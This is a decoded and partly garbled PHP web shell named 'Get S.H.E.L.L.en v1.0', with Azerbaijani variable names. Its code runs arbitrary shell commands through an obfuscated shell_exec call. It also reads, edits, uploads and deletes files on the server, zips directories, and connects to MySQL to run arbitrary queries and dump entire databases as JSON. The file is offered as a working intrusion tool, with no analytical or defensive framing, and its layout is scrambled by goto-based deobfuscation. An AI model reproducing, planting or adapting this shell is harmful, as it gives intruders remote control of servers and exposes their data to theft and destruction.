/* Decoded by unphp.net */ ")}function skl_bas(){sehife("?ne=skl&emr="+b64EncodeUnicode(document.getElementById("skl_emr").value))}function b64EncodeUnicode(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,n){return String.fromCharCode("0x"+n)}))}function goto(){var e=prompt("Dir:");e&&sehife("?qovluq="+e)}function ziple(e){var n=prompt("Dir:"," ')">Icra edin
"; } else { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "papka_yarat" && isset($_POST["ad"]) && !empty($_POST["ad"])) { $papkaAdi = basename(urldecode($_POST["ad"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($papkaAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $papkaAdi)) { print ""; } else { mkdir($default_dir . $ayirici . $papkaAdi); } } else { if ($ne == "fayl_ad_deyish" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"]) && isset($_POST["new_name"]) && is_string($_POST["new_name"]) && !empty($_POST["new_name"])) { $faylAdi = basename(deshifrele(urldecode($_POST["fayl"]))); $faylYeniAd = basename(urldecode($_POST["new_name"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { rename($default_dir . $ayirici . $faylAdi, $default_dir . $ayirici . $faylYeniAd); } } else { if ($ne == "skl_d_t" && isset($_POST["t"]) && is_string($_POST["t"]) && !empty($_POST["t"])) { $tableName = deshifrele(urldecode($_POST["t"])); $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $parol = isset($_COOKIE["parol"]) ? $_COOKIE["parol"] : ''; $baza = isset($_COOKIE["baza"]) ? $_COOKIE["baza"] : ''; $bazaStr = empty($baza) ? '' : "dbname=" . $baza . ";"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $data = $pdo->query("SELECT * FROM `" . $tableName . "`"); $data = $data->fetchAll(); header("Content-disposition: attachment; filename=d_" . basename(htmlspecialchars($tableName)) . ".json"); header("Content-type: application/json"); echo json_encode($data); } else { print "Table not found!"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else { if ($ne == "skl_d") { $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $parol = isset($_COOKIE["parol"]) ? $_COOKIE["parol"] : ''; $baza = isset($_COOKIE["baza"]) ? $_COOKIE["baza"] : ''; $bazaStr = empty($baza) ? '' : "dbname=" . $baza . ";"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare("SELECT table_name from information_schema.tables where table_schema=?"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); foreach ($tables as $tableName) { $tableName = $tableName["table_name"]; $data = $pdo->query("SELECT * FROM `" . $tableName . "`"); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header("Content-disposition: attachment; filename=d_b_" . basename(htmlspecialchars($baza)) . ".json"); header("Content-type: application/json"); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else { if ($ne == "ziple" && isset($_POST["save_to"], $_POST["zf"]) && is_string($_POST["save_to"]) && !empty($_POST["save_to"]) && !in_array($_POST["save_to"], array(".", "..", "./", "../")) && is_string($_POST["zf"]) && !empty($_POST["zf"])) { $save_to = deshifrele(urldecode($_POST["save_to"])); $rootPath = realpath(deshifrele(urldecode($_POST["zf"]))); $fileName1 = "bak_" . microtime(1) . "_" . rand(1000, 99999) . ".zip"; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if (is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "Saved!
"; } else { print "Dir is not writeable!
"; var_dump($save_to); } } else { if ($ne == "papka_sil" && isset($_POST["zf"]) && is_string($_POST["zf"]) && !empty($_POST["zf"])) { $rootPath = realpath(deshifrele(urldecode($_POST["zf"]))); if (is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); } else { print "Dir is not writeable!
"; var_dump($save_to); } } else { if ($ne == "fayl_upl" && isset($_FILES["ufayl"])) { move_uploaded_file($_FILES["ufayl"]["tmp_name"], $default_dir . "/" . $_FILES["ufayl"]["name"]); print "Upload oldu deyesen."; } } } } } } } } } } } } goto ygUGz; yneir: echo urlencode(urlencode(shifrele($default_dir))); goto xggtV; yX2dP: echo urlencode(urlencode(shifrele($default_dir))); goto HawB1; MqqoL: ?> &zf="+e+"&save_to="+b64EncodeUnicode(n))}function silPapka(e){confirm("Eminsen atash?")&&sehife("?ne=papka_sil&qovluq=Uname: " . php_uname() . "
"; print "User: " . getmyuid() . " (" . get_current_user() . ")
"; print "Group: " . getmygid() . " (" . $qrup . ")
"; } else { print "Uname: " . php_uname() . "
"; print "User: " . getmyuid() . " (" . get_current_user() . ")
"; print "Group: " . getmygid() . "
"; } goto D47te; h6gu1: if ($ne == "phpinfo") { print "
"; } else { if ($ne == "sistem_kom") { if (isset($_POST["kom"]) && is_string($_POST["kom"]) && !empty($_POST["kom"])) { $komanda = deshifrele(urldecode($_POST["kom"])); $k = "sh"; $k .= "el"; $k .= "l_e"; $k .= "xe"; $k .= "c"; $output = $k($komanda); print "
" . htmlspecialchars($output) . "

"; } print " "; } else { if ($ne == "fayl_oxu" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $faylAdi = basename(deshifrele(urldecode($_POST["fayl"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? " onclick='sehife("?ne=fayl_redakte&fayl=" . urlencode(urlencode(shifrele($faylAdi))) . "&qovluq=" . urlencode(urlencode(shifrele($default_dir))) . "")'" : " disabled"; print "
Fayl adı: " . htmlspecialchars($faylAdi) . "
"; print "
" . highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true) . "
"; } } else { if ($ne == "skl") { $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $parol = isset($_COOKIE["parol"]) ? $_COOKIE["parol"] : ''; $baza = isset($_COOKIE["baza"]) ? $_COOKIE["baza"] : ''; if (isset($_POST["host"], $_POST["user"], $_POST["parol"]) && is_string($_POST["host"]) && is_string($_POST["user"]) && is_string($_POST["parol"])) { $host = $_POST["host"]; $user = $_POST["user"]; $parol = $_POST["parol"]; $baza = ''; setcookie("host", $host, time() + 360000); setcookie("user", $user, time() + 360000); setcookie("parol", $parol, time() + 360000); setcookie("baza", $baza, time() + 360000); } if (isset($_POST["baza"]) && is_string($_POST["baza"])) { $baza = $_POST["baza"]; setcookie("baza", $baza, time() + 360000); } $bazaStr = empty($baza) ? '' : "dbname=" . $baza . ";"; ?>
"SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query("SELECT schema_name FROM information_schema.schemata"); print "
"; if (!empty($baza)) { $tables = $pdo->prepare("SELECT table_name from information_schema.tables where table_schema=?"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); print "
"; print "!! Dump DB !!
"; foreach ($tables as $tableName) { $tableName = $tableName["table_name"]; print "" . htmlspecialchars($tableName) . "
"; } print "
"; print "
"; if (isset($_POST["t"]) && is_string($_POST["t"]) && !empty($_POST["t"])) { $tableName = deshifrele(urldecode($_POST["t"])); print "Table: " . htmlspecialchars($tableName) . " ( Dump )
"; $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $dataCount = $pdo->query("SELECT count(0) AS ss from `" . $tableName . "`"); $dataCount = (int) $dataCount->fetchColumn(); print "Count: " . $dataCount . "

"; $pages = ceil($dataCount / 100); $currentPage = isset($_POST["sehife"]) && is_numeric($_POST["sehife"]) && $_POST["sehife"] >= 1 && $_POST["sehife"] <= $pages ? (int) $_POST["sehife"] : 1; for ($p = 1; $p <= $pages; $p++) { print "" . $p . " "; } print "

"; $start = 100 * ($currentPage - 1); $data = $pdo->query("SELECT * FROM `" . $tableName . "` LIMIT " . $start . " , 100"); $data = $data->fetchAll(); print ""; foreach ($columns as $columnInf) { print ""; } print ""; foreach ($data as $row) { print ""; foreach ($row as $key => $val) { print ""; } print ""; } print "
" . htmlspecialchars($columnInf["column_name"]) . "
" . $val . "
"; } else { print "Table not found!"; } } else { if (isset($_POST["emr"]) && is_string($_POST["emr"]) && !empty($_POST["emr"])) { $emr = deshifrele(urldecode($_POST["emr"])); print "SQL emr: " . htmlspecialchars($emr) . "
"; $data = $pdo->query($emr); $data = $data->fetchAll(); print ""; if (count($data) > 0) { print ""; foreach ($data[0] as $key => $val) { print ""; } print ""; } print ""; foreach ($data as $row) { print ""; foreach ($row as $key => $val) { print ""; } print ""; } print "
" . $key . "
" . $val . "
"; } } print "
"; print "
"; print "
"; } } catch (Exception $e) { print $e->getMessage(); } } } else { if ($ne == "fayl_redakte" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $faylAdi = basename(deshifrele(urldecode(urldecode($_POST["fayl"])))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $status = ''; if (isset($_POST["content"]) && isset($_POST["took"]) && $_POST["took"] != '' && isset($_SESSION["ys_took"]) && $_SESSION["ys_took"] == $_POST["took"] && is_writeable($default_dir . $ayirici . $faylAdi)) { unset($_SESSION["ys_took"]); $content = $_POST["content"]; $cc = array("a", "i", "e", "s", "l", "b", "u", "o", "p", "h", "(", ")", "<", ">", "?", ";", "[", "]", "$"); foreach ($cc as $k1 => $v1) { $content = str_replace("|:" . $k1 . ":|", $v1, $content); } $faylAch = fopen($default_dir . $ayirici . $faylAdi, "w+"); fwrite($faylAch, $content); fclose($faylAch); $status = " Uğurla yadda saxlanıldı!"; } $oxuUrl = "?ne=fayl_oxu&fayl=" . urlencode(urlencode(shifrele($faylAdi))) . "&qovluq=" . urlencode(urlencode(shifrele($default_dir))); $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? '' : " disabled"; print "
Fayl adı: " . htmlspecialchars($faylAdi) . "
"; print ""; } else { print "Error! " . htmlspecialchars($default_dir . $ayirici . $faylAdi); } } else { if (is_dir($default_dir)) { if (is_readable($default_dir)) { $qovluqIchi = scandir($default_dir); foreach ($qovluqIchi as &$emelemnt) { $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($emelemnt, 0, 1) != "/" ? "/" : ''; if (is_dir($default_dir . $ayirici . $emelemnt)) { $emelemnt = "0" . $emelemnt; } else { $emelemnt = "1" . $emelemnt; } } asort($qovluqIchi); print ""; foreach ($qovluqIchi as $element) { $url = ''; $element = substr($element, 1); $faylAdiTam = $default_dir . $ayirici . $element; $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($element, 0, 1) != "/" ? "/" : ''; $adi = is_dir($faylAdiTam) ? "[ {$element} ]" : $element; $classN = ''; if (is_dir($faylAdiTam)) { if ($element == ".") { $url = "?qovluq=" . urlencode(urlencode(shifrele($default_dir))); } else { if ($element == "..") { $yeniUrl = explode("/", $default_dir); foreach (array_reverse($yeniUrl) as $j => $qq) { if (trim($qq) != '') { unset($yeniUrl[count($yeniUrl) - $j - 1]); break; } } $url = "?qovluq=" . urlencode(urlencode(shifrele(implode("/", $yeniUrl)))); } else { $url = "?qovluq=" . urlencode(urlencode(shifrele($faylAdiTam))); } } $classN = " style='font-weight: 600;'"; } else { $url = "?ne=fayl_oxu&fayl=" . urlencode(urlencode(shifrele($element))) . "&qovluq=" . urlencode(urlencode(shifrele($default_dir))); } $fayldi = is_file($faylAdiTam); $isReadableColor = is_readable($faylAdiTam) && is_writeable($faylAdiTam); print " \x9\x9\x9 \xa \x9 \x9 \x9\x9 \xa\x9\x9\x9\x9 \x9\x9 \x9 \x9 " . substr(sprintf("%o", fileperms($faylAdiTam)), -4) . " \xa \x9\x9 \x9"; } } else { print "
Permissions denided!
"; } } } } } } } goto UH836; mA406: $safeMode = true; goto fh9Qj; D47te: print "Disable functions: " . (implode(", ", $baqliFunksiyalar) == '' ? "yoxdu :)" : "" . implode(", ", $baqliFunksiyalar)) . "
"; goto Cd3Vj; ygUGz: ?> Get S.H.E.L.L.en v1.0 | BY ..
Yeni fayl | Yeni papka
\xa @keyframes fadeIn { from { opacity: 0; }\xa to { opacity: 1; } } \xa h2 {\xa animation: fadeIn 2s linear;\xa }\xa "; } echo "\xa \xa


\xa "; die; } goto VVn9w; UH836: print "
" . htmlspecialchars($adi) . "" . ($fayldi ? sizeFormat(filesize($faylAdiTam)) : '') . "" . date("d M Y, H:i", filectime($faylAdiTam)) . "" . htmlspecialchars(fileowner($faylAdiTam)) . ""; if (is_file($faylAdiTam)) { print " Download | " . (" Rename | ") . (" Truncate | ") . (" Delete"); } else { if ($adi != "[ . ]" && $adi != "[ .. ]") { print " Zip | " . (" Sil"); } } print "
"; goto XSSO7; kjyBu: function sizeFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " Gb"; } else { if ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " Mb"; } else { if ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " Kb"; } else { $bytes = $bytes . " b"; } } } return $bytes; } goto J2W1x; qBR_a: echo urlencode(urlencode(shifrele($default_dir))); goto DlKEc; S2ToV: function qovluquYaz() { global $default_dir; $sonDir = array(); $umumiHisseler = ''; $parse = explode("/", $default_dir); $ii = 0; foreach ($parse as $hisse) { $ii++; $umumiHisseler .= $hisse . "/"; $sonDir[] = "" . htmlspecialchars(empty($hisse) && $ii != count($parse) ? "/" : $hisse) . ""; } $sonDir = implode("/", $sonDir); print $sonDir . "      ( Reset | Go to )"; } goto kjyBu; KyG1c: qovluquYaz(); goto A4uIu; A4uIu: print "
"; goto h6gu1; ZgcDO: echo urlencode(urlencode(shifrele($default_dir))); goto MqqoL; fbJbF: echo urlencode(urlencode(shifrele($default_dir))); goto x_mUh; mbDQb: function tookYarat($tAd) { if (isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $yeniTook = md5(shifrele(time() . rand(1, 99999999))); $_SESSION[$tAd] = $yeniTook; return $yeniTook; } goto S2ToV; VVn9w: $baqliFunksiyalar = explode(",", ''); goto mA406; x_mUh: ?> &zf="+e)}function shifrelee(){var e=document.getElementsByClassName("file_edit")[0].value,n=["a","i","e","s","l","b","u","o","p","h","\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"];for(var t in n){var i=n[t];e=e.replace(new RegExp(i,"g"),"|:"+t+":|")}document.getElementsByClassName("file_edit")[0].value=e}document.getElementById("emr_et_atash").addEventListener("keyup",function(e){e.preventDefault(),13===e.keyCode&&sistemKom()})